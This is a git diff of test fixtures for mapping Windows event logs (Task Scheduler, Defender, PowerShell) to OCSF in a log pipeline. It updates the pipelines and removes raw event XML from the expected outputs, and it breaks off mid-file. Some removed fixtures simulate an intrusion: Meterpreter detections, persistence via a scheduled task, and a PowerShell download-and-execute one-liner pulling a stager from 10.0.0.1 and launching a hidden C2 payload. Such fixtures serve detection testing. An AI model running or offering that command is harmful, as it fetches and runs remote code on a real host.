+this = data.parse_winlog() +microsoft::asim::map name = @name select name, EventSchema, EventSchemaVersion, EventType, EventResult, EventProduct, EventVendor, EventOriginalType, diff --git a/microsoft/tests/ocsf/eid-0100.tql b/microsoft/tests/ocsf/eid-0100.tql index 28242cd..ba407bd 100644 --- a/microsoft/tests/ocsf/eid-0100.tql +++ b/microsoft/tests/ocsf/eid-0100.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0100.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0100.txt b/microsoft/tests/ocsf/eid-0100.txt index cdd4ffe..dd0e623 100644 --- a/microsoft/tests/ocsf/eid-0100.txt +++ b/microsoft/tests/ocsf/eid-0100.txt @@ -40,8 +40,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 100\n 0\n 4\n 0\n 0x8000000000000000\n \n 30100\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n NT AUTHORITY\\SYSTEM\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n \n\n", - raw_data_size: 871, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0101.tql b/microsoft/tests/ocsf/eid-0101.tql index 3371198..a8a0536 100644 --- a/microsoft/tests/ocsf/eid-0101.tql +++ b/microsoft/tests/ocsf/eid-0101.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0101.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0101.txt b/microsoft/tests/ocsf/eid-0101.txt index 2969cf5..2deee87 100644 --- a/microsoft/tests/ocsf/eid-0101.txt +++ b/microsoft/tests/ocsf/eid-0101.txt @@ -34,8 +34,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 101\n 0\n 2\n 0\n 0x8000000000000000\n \n 30101\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {1A2B3C4D-5E6F-7A8B-9C0D-1E2F3A4B5C6D}\n -2147024894\n \n\n", - raw_data_size: 862, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-0102.tql b/microsoft/tests/ocsf/eid-0102.tql index a18d7c4..d970c62 100644 --- a/microsoft/tests/ocsf/eid-0102.tql +++ b/microsoft/tests/ocsf/eid-0102.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0102.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0102.txt b/microsoft/tests/ocsf/eid-0102.txt index 86b457d..d3d0576 100644 --- a/microsoft/tests/ocsf/eid-0102.txt +++ b/microsoft/tests/ocsf/eid-0102.txt @@ -34,8 +34,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 102\n 0\n 4\n 0\n 0x8000000000000000\n \n 30102\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n 0\n \n\n", - raw_data_size: 852, severity: "Informational", severity_id: 1, status: "Success", diff --git a/microsoft/tests/ocsf/eid-0106.tql b/microsoft/tests/ocsf/eid-0106.tql index bc298a6..88bba1f 100644 --- a/microsoft/tests/ocsf/eid-0106.tql +++ b/microsoft/tests/ocsf/eid-0106.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0106.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0106.txt b/microsoft/tests/ocsf/eid-0106.txt index aa76ea2..fd47aad 100644 --- a/microsoft/tests/ocsf/eid-0106.txt +++ b/microsoft/tests/ocsf/eid-0106.txt @@ -40,8 +40,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 106\n 0\n 4\n 0\n 0x8000000000000000\n \n 30106\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n CORP\\jdoe\n \n\n", - raw_data_size: 787, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0129.tql b/microsoft/tests/ocsf/eid-0129.tql index 157c549..aef6b70 100644 --- a/microsoft/tests/ocsf/eid-0129.tql +++ b/microsoft/tests/ocsf/eid-0129.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0129.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0129.txt b/microsoft/tests/ocsf/eid-0129.txt index 485399c..ed2b6bf 100644 --- a/microsoft/tests/ocsf/eid-0129.txt +++ b/microsoft/tests/ocsf/eid-0129.txt @@ -39,8 +39,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 129\n 0\n 4\n 0\n 0x8000000000000000\n \n 30129\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n 6812\n \n\n", - raw_data_size: 854, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0140.tql b/microsoft/tests/ocsf/eid-0140.tql index f0f8c55..d3b1e42 100644 --- a/microsoft/tests/ocsf/eid-0140.tql +++ b/microsoft/tests/ocsf/eid-0140.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0140.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0140.txt b/microsoft/tests/ocsf/eid-0140.txt index 1dca283..85c9ca3 100644 --- a/microsoft/tests/ocsf/eid-0140.txt +++ b/microsoft/tests/ocsf/eid-0140.txt @@ -40,8 +40,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 140\n 0\n 4\n 0\n 0x8000000000000000\n \n 30140\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n CORP\\jdoe\n \n\n", - raw_data_size: 787, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0141.tql b/microsoft/tests/ocsf/eid-0141.tql index cc0c3f0..74937b5 100644 --- a/microsoft/tests/ocsf/eid-0141.tql +++ b/microsoft/tests/ocsf/eid-0141.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0141.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0141.txt b/microsoft/tests/ocsf/eid-0141.txt index ea7c9e9..f84c9fb 100644 --- a/microsoft/tests/ocsf/eid-0141.txt +++ b/microsoft/tests/ocsf/eid-0141.txt @@ -40,8 +40,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 141\n 0\n 4\n 0\n 0x8000000000000000\n \n 30141\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n CORP\\jdoe\n \n\n", - raw_data_size: 787, severity: "Informational", severity_id: 1, time: 2024-03-23T12:35:01Z, diff --git a/microsoft/tests/ocsf/eid-0200.tql b/microsoft/tests/ocsf/eid-0200.tql index b005263..d4fe04f 100644 --- a/microsoft/tests/ocsf/eid-0200.tql +++ b/microsoft/tests/ocsf/eid-0200.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0200.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0200.txt b/microsoft/tests/ocsf/eid-0200.txt index 7410aea..cd37b92 100644 --- a/microsoft/tests/ocsf/eid-0200.txt +++ b/microsoft/tests/ocsf/eid-0200.txt @@ -45,8 +45,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 200\n 0\n 4\n 0\n 0x8000000000000000\n \n 30200\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n C:\\tmp\\payload.exe\n 1032\n \n\n", - raw_data_size: 912, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0201.tql b/microsoft/tests/ocsf/eid-0201.tql index 607df7f..4433671 100644 --- a/microsoft/tests/ocsf/eid-0201.tql +++ b/microsoft/tests/ocsf/eid-0201.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0201.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0201.txt b/microsoft/tests/ocsf/eid-0201.txt index 3d16e3a..49c8184 100644 --- a/microsoft/tests/ocsf/eid-0201.txt +++ b/microsoft/tests/ocsf/eid-0201.txt @@ -40,8 +40,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 201\n 0\n 4\n 0\n 0x8000000000000000\n \n 30201\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n C:\\tmp\\payload.exe\n 0\n \n\n", - raw_data_size: 910, severity: "Informational", severity_id: 1, status: "Success", diff --git a/microsoft/tests/ocsf/eid-1000.tql b/microsoft/tests/ocsf/eid-1000.tql index 7a91880..60543e4 100644 --- a/microsoft/tests/ocsf/eid-1000.tql +++ b/microsoft/tests/ocsf/eid-1000.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1000.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1000.txt b/microsoft/tests/ocsf/eid-1000.txt index c4f9336..e83a5ed 100644 --- a/microsoft/tests/ocsf/eid-1000.txt +++ b/microsoft/tests/ocsf/eid-1000.txt @@ -43,8 +43,6 @@ path: "C:\\tmp\\payload.exe", pid: 6732, }, - raw_data: "\n \n \n 1000\n 0\n 2\n 100\n 0x80000000000000\n \n 8001\n \n \n Application\n WINHOST01.corp.local\n \n \n payload.exe\n 0.0.0.0\n 67df1234\n payload.exe\n 0.0.0.0\n 67df1234\n c0000005\n 000000000000a3f0\n 0x1a4c\n 01da7c3f0b9a1234\n C:\\tmp\\payload.exe\n C:\\tmp\\payload.exe\n f87a1b2c-3d4e-5f6a-7b8c-9d0e1f2a3b4c\n \n\n", - raw_data_size: 1161, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-1001.tql b/microsoft/tests/ocsf/eid-1001.tql index de919fc..5ed23f8 100644 --- a/microsoft/tests/ocsf/eid-1001.tql +++ b/microsoft/tests/ocsf/eid-1001.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1001.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1001.txt b/microsoft/tests/ocsf/eid-1001.txt index b826ac0..5f1ea88 100644 --- a/microsoft/tests/ocsf/eid-1001.txt +++ b/microsoft/tests/ocsf/eid-1001.txt @@ -42,8 +42,6 @@ name: "payload.exe", path: "C:\\tmp\\payload.exe", }, - raw_data: "\n \n \n 1001\n 0\n 4\n 0\n 0x80000000000000\n \n 8002\n \n \n Application\n WINHOST01.corp.local\n \n \n 1234567890\n APPCRASH\n Not available\n 0\n payload.exe\n 0.0.0.0\n payload.exe\n 0.0.0.0\n c0000005\n 000000000000a3f0\n f87a1b2c-3d4e-5f6a-7b8c-9d0e1f2a3b4c\n C:\\tmp\\payload.exe\n C:\\tmp\\payload.exe\n \n\n", - raw_data_size: 1159, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-1002.tql b/microsoft/tests/ocsf/eid-1002.tql index 8930325..7e62840 100644 --- a/microsoft/tests/ocsf/eid-1002.tql +++ b/microsoft/tests/ocsf/eid-1002.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1002.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1002.txt b/microsoft/tests/ocsf/eid-1002.txt index 0c8a4f7..616c0dd 100644 --- a/microsoft/tests/ocsf/eid-1002.txt +++ b/microsoft/tests/ocsf/eid-1002.txt @@ -43,8 +43,6 @@ path: "C:\\tmp\\payload.exe", pid: 6732, }, - raw_data: "\n \n \n 1002\n 0\n 2\n 101\n 0x80000000000000\n \n 8003\n \n \n Application\n WINHOST01.corp.local\n \n \n payload.exe\n 0.0.0.0\n 67df1234\n 0x1a4c\n 01da7c3f0b9a1234\n 60000\n 4\n f87a1b2c-3d4e-5f6a-7b8c-9d0e1f2a3b4c\n C:\\tmp\\payload.exe\n \n\n", - raw_data_size: 966, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-1006.tql b/microsoft/tests/ocsf/eid-1006.tql index cd39dbf..fb37b06 100644 --- a/microsoft/tests/ocsf/eid-1006.tql +++ b/microsoft/tests/ocsf/eid-1006.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1006.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1006.txt b/microsoft/tests/ocsf/eid-1006.txt index 7829bd6..81eb5db 100644 --- a/microsoft/tests/ocsf/eid-1006.txt +++ b/microsoft/tests/ocsf/eid-1006.txt @@ -70,8 +70,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 1006\n 0\n 3\n 0\n 0x8000000000000000\n \n 41006\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Trojan:Win32/Meterpreter.A!MSR\n 2147735503\n Severe\n Trojan\n C:\\tmp\\payload.exe\n Local machine\n Concrete\n Real-time Protection\n CORP\\jdoe\n C:\\tmp\\payload.exe\n 1.405.12.0\n 1.1.24010.10\n \n\n", - raw_data_size: 1271, severity: "Critical", severity_id: 5, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-1007.tql b/microsoft/tests/ocsf/eid-1007.tql index 429cf01..bbe415e 100644 --- a/microsoft/tests/ocsf/eid-1007.tql +++ b/microsoft/tests/ocsf/eid-1007.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1007.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1007.txt b/microsoft/tests/ocsf/eid-1007.txt index 4fb0a8e..0fbb9ef 100644 --- a/microsoft/tests/ocsf/eid-1007.txt +++ b/microsoft/tests/ocsf/eid-1007.txt @@ -52,8 +52,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 1007\n 0\n 4\n 0\n 0x8000000000000000\n \n 41007\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Trojan:Win32/Meterpreter.A!MSR\n 2147735503\n Severe\n Trojan\n Quarantine\n NT AUTHORITY\\SYSTEM\n 1.405.12.0\n 1.1.24010.10\n \n\n", - raw_data_size: 1054, severity: "Critical", severity_id: 5, time: 2024-03-23T12:34:58.123456700Z, diff --git a/microsoft/tests/ocsf/eid-1102.tql b/microsoft/tests/ocsf/eid-1102.tql index 5bf1783..92071e4 100644 --- a/microsoft/tests/ocsf/eid-1102.tql +++ b/microsoft/tests/ocsf/eid-1102.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1102.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1102.txt b/microsoft/tests/ocsf/eid-1102.txt index 8bf4313..0853412 100644 --- a/microsoft/tests/ocsf/eid-1102.txt +++ b/microsoft/tests/ocsf/eid-1102.txt @@ -44,8 +44,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 1102\n 0\n 4\n 104\n 0x4020000000000000\n \n 99001\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 0x1234\n 131972735680000000\n \n\n", - raw_data_size: 949, severity: "High", severity_id: 4, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-1116.tql b/microsoft/tests/ocsf/eid-1116.tql index c4657ce..dd1c6de 100644 --- a/microsoft/tests/ocsf/eid-1116.tql +++ b/microsoft/tests/ocsf/eid-1116.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1116.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1116.txt b/microsoft/tests/ocsf/eid-1116.txt index d59c8af..a334e6b 100644 --- a/microsoft/tests/ocsf/eid-1116.txt +++ b/microsoft/tests/ocsf/eid-1116.txt @@ -72,8 +72,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 1116\n 0\n 3\n 0\n 0x8000000000000000\n \n 41116\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n {A1B2C3D4-E5F6-7A8B-9C0D-1E2F3A4B5C6D}\n 2024-03-23T12:34:56.789012300Z\n \n \n 2147735503\n Trojan:Win32/Meterpreter.A!MSR\n 5\n Severe\n 8\n Trojan\n https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Meterpreter.A!MSR&threatid=2147735503\n 1\n \n 1\n 4\n Real-time Protection\n C:\\tmp\\payload.exe\n CORP\\jdoe\n \n C:\\tmp\\payload.exe\n 1\n Local machine\n 1\n Suspended\n 0\n Concrete\n 0\n 9\n Not Applicable\n \n 1.405.12.0\n 1.1.24010.10\n \n\n", - raw_data_size: 2346, severity: "Critical", severity_id: 5, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-1117.tql b/microsoft/tests/ocsf/eid-1117.tql index 2c6ea04..8fda408 100644 --- a/microsoft/tests/ocsf/eid-1117.tql +++ b/microsoft/tests/ocsf/eid-1117.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1117.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1117.txt b/microsoft/tests/ocsf/eid-1117.txt index 0026ebf..40294ac 100644 --- a/microsoft/tests/ocsf/eid-1117.txt +++ b/microsoft/tests/ocsf/eid-1117.txt @@ -72,8 +72,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 1117\n 0\n 4\n 0\n 0x8000000000000000\n \n 41117\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n {A1B2C3D4-E5F6-7A8B-9C0D-1E2F3A4B5C6D}\n 2024-03-23T12:34:56.789012300Z\n \n \n 2147735503\n Trojan:Win32/Meterpreter.A!MSR\n 5\n Severe\n 8\n Trojan\n https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Meterpreter.A!MSR&threatid=2147735503\n 1\n \n 2\n 4\n Real-time Protection\n C:\\tmp\\payload.exe\n CORP\\jdoe\n \n C:\\tmp\\payload.exe\n 1\n Local machine\n 1\n Suspended\n 0\n Concrete\n 0\n 2\n Quarantine\n NT AUTHORITY\\SYSTEM\n 1.405.12.0\n 1.1.24010.10\n \n\n", - raw_data_size: 2361, severity: "Critical", severity_id: 5, time: 2024-03-23T12:34:58.123456700Z, diff --git a/microsoft/tests/ocsf/eid-1121.tql b/microsoft/tests/ocsf/eid-1121.tql index a9cd4eb..ba6e840 100644 --- a/microsoft/tests/ocsf/eid-1121.tql +++ b/microsoft/tests/ocsf/eid-1121.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1121.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1121.txt b/microsoft/tests/ocsf/eid-1121.txt index 0f71cf6..0046897 100644 --- a/microsoft/tests/ocsf/eid-1121.txt +++ b/microsoft/tests/ocsf/eid-1121.txt @@ -80,8 +80,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 1121\n 0\n 3\n 0\n 0x8000000000000000\n \n 41121\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n C:\\tmp\\payload.exe\n C:\\tmp\\payload.exe\n SHA256=AABBCCDDEEFF00112233445566778899AABBCCDDEEFF00112233445566778899\n CORP\\jdoe\n 4.18.24010.12\n C:\\tmp\\payload.exe\n Exploit:Win32/CVE-2024-99999\n d4f940ab-401b-4efc-aadc-ad5f3c50688a\n Block process creations originating from PSExec and WMI commands\n \n\n", - raw_data_size: 1331, severity: "High", severity_id: 4, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-2000.tql b/microsoft/tests/ocsf/eid-2000.tql index a6944b1..a922689 100644 --- a/microsoft/tests/ocsf/eid-2000.tql +++ b/microsoft/tests/ocsf/eid-2000.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-2000.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-2000.txt b/microsoft/tests/ocsf/eid-2000.txt index d0ebfad..c32a236 100644 --- a/microsoft/tests/ocsf/eid-2000.txt +++ b/microsoft/tests/ocsf/eid-2000.txt @@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 2000\n 0\n 4\n 0\n 0x8000000000000000\n \n 42000\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n 1.405.12.0\n 1.405.11.0\n Microsoft Malware Protection Center\n Install\n https://go.microsoft.com/fwlink/?linkid=74005\n AntiVirus\n Full\n NT AUTHORITY\\SYSTEM\n 1.1.24010.10\n 1.1.24010.10\n \n\n", - raw_data_size: 1245, severity: "Informational", severity_id: 1, time: 2024-03-23T12:35:01Z, diff --git a/microsoft/tests/ocsf/eid-4100.tql b/microsoft/tests/ocsf/eid-4100.tql index 44a701f..8bef252 100644 --- a/microsoft/tests/ocsf/eid-4100.tql +++ b/microsoft/tests/ocsf/eid-4100.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4100.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4100.txt b/microsoft/tests/ocsf/eid-4100.txt index f268b27..3edd2ca 100644 --- a/microsoft/tests/ocsf/eid-4100.txt +++ b/microsoft/tests/ocsf/eid-4100.txt @@ -44,8 +44,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4100\n 1\n 3\n 1\n 0x0\n \n 20100\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n -2146233087\n Access to the path 'C:\\Windows\\System32\\payload.exe' is denied.\n Error\n ConsoleHost\n 5.1.19041.4648\n {{a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}}\n C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n 5.1.19041.4648\n {{f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}}\n 2\n \n Copy-Item -Path C:\\tmp\\payload.exe -Destination C:\\Windows\\System32\\\n Copy-Item\n CORP\\jdoe\n \n Microsoft.PowerShell\n \n\n", - raw_data_size: 1600, script: { name: "Copy-Item", type: "PowerShell", diff --git a/microsoft/tests/ocsf/eid-4103.tql b/microsoft/tests/ocsf/eid-4103.tql index ab4cf96..a310227 100644 --- a/microsoft/tests/ocsf/eid-4103.tql +++ b/microsoft/tests/ocsf/eid-4103.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4103.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4103.txt b/microsoft/tests/ocsf/eid-4103.txt index 80ac0b4..eb075a8 100644 --- a/microsoft/tests/ocsf/eid-4103.txt +++ b/microsoft/tests/ocsf/eid-4103.txt @@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4103\n 1\n 4\n 1\n 0x0\n \n 20103\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n Severity = Informational\n Host Name = ConsoleHost\n Host Version = 5.1.19041.4648\n Host ID = {{a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}}\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n Engine Version = 5.1.19041.4648\n Runspace ID = {{f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}}\n Pipeline ID = 3\n Command Name = Invoke-Expression\n Command Type = Cmdlet\n Script Name =\n Command Path =\n Sequence Number = 15\n User = CORP\\jdoe\n Connected User =\n Shell ID = Microsoft.PowerShell\n CommandInvocation(Invoke-Expression): \"Invoke-Expression\"\nParameterBinding(Invoke-Expression): name=\"Command\"; value=\"Start-Process -FilePath 'C:\tmp\\payload.exe' -ArgumentList '--c2 10.0.0.1' -WindowStyle Hidden\"\n \n\n", - raw_data_size: 1553, script: { type: "PowerShell", type_id: 2, diff --git a/microsoft/tests/ocsf/eid-4104.tql b/microsoft/tests/ocsf/eid-4104.tql index e95bc7d..90d213e 100644 --- a/microsoft/tests/ocsf/eid-4104.tql +++ b/microsoft/tests/ocsf/eid-4104.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4104.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4104.txt b/microsoft/tests/ocsf/eid-4104.txt index c6a085e..7ecd496 100644 --- a/microsoft/tests/ocsf/eid-4104.txt +++ b/microsoft/tests/ocsf/eid-4104.txt @@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4104\n 1\n 3\n 2\n 0x0\n \n 20104\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n 1\n 1\n IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/stager.ps1'); Start-Process -FilePath 'C:\\tmp\\payload.exe' -ArgumentList '--c2 10.0.0.1' -WindowStyle Hidden\n {f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}\n \n \n\n", - raw_data_size: 1061, script: { type: "PowerShell", type_id: 2, diff --git a/microsoft/tests/ocsf/eid-4105.tql b/microsoft/tests/ocsf/eid-4105.tql index e7ed9d1..f7042be 100644 --- a/microsoft/tests/ocsf/eid-4105.tql +++ b/microsoft/tests/ocsf/eid-4105.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4105.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4105.txt b/microsoft/tests/ocsf/eid-4105.txt index 59d0611..48a12cb 100644 --- a/microsoft/tests/ocsf/eid-4105.txt +++ b/microsoft/tests/ocsf/eid-4105.txt @@ -36,8 +36,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4105\n 1\n 5\n 2\n 0x0\n \n 20105\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n {f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}\n {a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}\n \n\n", - raw_data_size: 837, script: { type: "PowerShell", type_id: 2, diff --git a/microsoft/tests/ocsf/eid-4106.tql b/microsoft/tests/ocsf/eid-4106.tql index 0278912..11ac110 100644 --- 